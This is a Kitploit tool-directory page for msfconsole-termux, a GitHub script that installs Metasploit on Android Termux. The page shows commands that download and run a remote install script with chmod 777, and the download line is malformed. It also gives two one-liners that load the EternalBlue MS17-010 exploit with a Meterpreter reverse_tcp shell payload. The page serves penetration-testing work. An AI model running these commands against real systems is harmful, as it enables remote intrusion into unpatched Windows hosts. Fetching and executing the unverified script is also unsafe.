Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
msfconsole-termux — How To Install Metasploit-Table on the Android Termux | Kitploit
Tools/GitHubGitHub/jas502n/msfconsole-termux
Penetration Testing FrameworksExploit FrameworksScripting & AutomationLearning & Education
GitHubjas502n/msfconsole-termux

msfconsole-termux

How To Install Metasploit-Table on the Android Termux

View Repository
581768 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

msfconsole-termux

How To Install Metasploit-Table on the Android Termux

root@kitploit:~
pkg  update

apt-get install curl wget -y

wget https://raw.githubusercontent.com/jas502n/msfconsole-termux/master/metasploit.sh |chmod 777 metasploit.sh && ./metasploit.sh


EXP

root@kitploit:~
msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue;set payload windows/x64/meterpreter/reverse_tcp;set ProcessName explorer.exe;show options"


msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue;set payload windows/meterpreter/reverse_tcp;set ProcessName explorer.exe;show options"

Download Tool